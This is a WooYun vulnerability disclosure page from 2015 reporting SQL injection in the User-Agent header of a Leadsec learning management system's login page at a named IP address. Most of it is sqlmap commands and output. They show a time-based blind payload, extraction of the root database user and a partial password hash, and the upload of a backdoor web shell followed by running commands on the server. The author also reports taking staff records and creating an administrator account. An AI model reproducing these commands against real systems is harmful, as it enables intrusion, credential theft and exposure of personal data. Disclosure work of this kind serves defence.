网御Leadsec学习管理系统，存在SQL注入，已getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165932

漏洞标题：网御Leadsec学习管理系统，存在SQL注入，已getshell

漏洞作者： Trail-Say

提交时间：2015-12-30 01:35

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-30：细节已通知厂商并且等待厂商处理中
2015-12-31：厂商已经确认，细节仅向厂商公开
2016-01-10：细节向核心白帽子及相关领域专家公开
2016-01-20：细节向普通白帽子公开
2016-01-30：细节向实习白帽子公开
2016-02-12：细节向公众公开

简要描述：

等待面试中...

详细说明：

注入点在
登录界面

http://106.37.209.144/zlms/portal/sp/login.php

的

User-Agent

字段

E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --current-db --current-user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201512100967}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:40:30
[23:40:30] [INFO] testing connection to the target URL
[23:40:31] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM
---
[23:40:31] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[23:41:10] [INFO] confirming MySQL
[23:41:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[23:41:31] [INFO] adjusting time delay to 4 seconds due to good response times
[23:41:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.10, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[23:41:31] [INFO] fetching current user
[23:41:31] [INFO] retrieved: root@localhost
[23:50:59] [ERROR] invalid character detected. retrying..
[23:50:59] [WARNING] increasing time delay to 5 seconds
current user:    'root@localhost'
[23:51:01] [INFO] fetching current database
[23:51:01] [INFO] retrieved: lms
current database:    'lms'

E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --password
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201512100967}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:14:13
[00:14:13] [INFO] testing connection to the target URL
[00:14:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM
---
[00:14:14] [INFO] testing MySQL
[00:14:14] [INFO] confirming MySQL
[00:14:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.10, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[00:14:14] [INFO] fetching database users password hashes
[00:14:14] [INFO] fetching database users
[00:14:14] [INFO] fetching number of database users
[00:14:14] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[00:14:26] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[00:14:50] [INFO] retrieved:
[00:15:12] [INFO] adjusting time delay to 1 second due to good response times
'root'@'localhost'
[00:18:28] [INFO] fetching number of password hashes for user 'root'
[00:18:28] [INFO] retrieved: 1
[00:18:35] [INFO] fetching password hashes for user 'root'
[00:18:35] [INFO] retrieved: 4630
[00:19:29] [ERROR] invalid character detected. retrying..
[00:19:29] [WARNING] increasing time delay to 2 seconds
c75c3
[00:21:04] [ERROR] invalid character detected. retrying..
[00:21:04] [WARNING] increasing time delay to 3 seconds
1e0f5b2
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] root [1]:
    password hash: ***********************

漏洞证明：

由于是延迟注入，跑数据实在是太耗时间了
我就直接getshell吧

E:\Python27\sqlmap>sqlmap.py -u "http://106.37.209.144/zlms/portal/sp/login.php" -p "User-Agent" --dbms "mysql" --os-shell
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201512100967}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:59:54
[23:59:54] [INFO] testing connection to the target URL
[23:59:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: sqlmap/1.0-dev-nongit-201512100967 (http://sqlmap.org)' AND (SELECT * FROM (SELECT(SLEEP(5)))XzGg) AND 'gAdM'='gAdM
---
[23:59:55] [INFO] testing MySQL
[23:59:55] [INFO] confirming MySQL
[23:59:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.10, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0
[23:59:55] [INFO] going to use a web backdoor for command prompt
[23:59:55] [INFO] fingerprinting the back-end DBMS operating system
[23:59:55] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[23:59:58] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: C:\ZLMS2\htdocs\
[00:01:30] [WARNING] unable to automatically parse any web server path
[00:01:30] [INFO] trying to upload the file stager on '/ZLMS2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[00:01:31] [INFO] heuristics detected web page charset 'ascii'
[00:01:31] [INFO] the file stager has been successfully uploaded on '/ZLMS2/htdocs/' - http://106.37.209.144:80/tmpuumxu.php
[00:01:31] [INFO] the backdoor has been successfully uploaded on '/ZLMS2/htdocs/' - http://106.37.209.144:80/tmpbbrrj.php
[00:01:31] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[00:06:31] [INFO] heuristics detected web page charset 'GB2312'
command standard output:
---
Windows IP Configuration
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 192.168.86.3
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.86.253
---

webshell

100多条内部人员信息

创建了个管理员，以证明漏洞的存在

修复方案：

过滤！你们应该比我专业！

版权声明：转载请注明来源 Trail-Say@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-12-31 13:53

厂商回复：

经确认此系统属于已经废弃不用的系统。现在已经做下线处理。感谢Trail-Say。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165932

漏洞标题：网御Leadsec学习管理系统，存在SQL注入，已getshell

相关厂商：leadsec.com.cn

漏洞作者： Trail-Say

提交时间：2015-12-30 01:35

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Trail-Say@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165932

漏洞标题：网御Leadsec学习管理系统，存在SQL注入，已getshell

相关厂商：leadsec.com.cn

漏洞作者： Trail-Say

提交时间：2015-12-30 01:35

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0165932"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Trail-Say@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：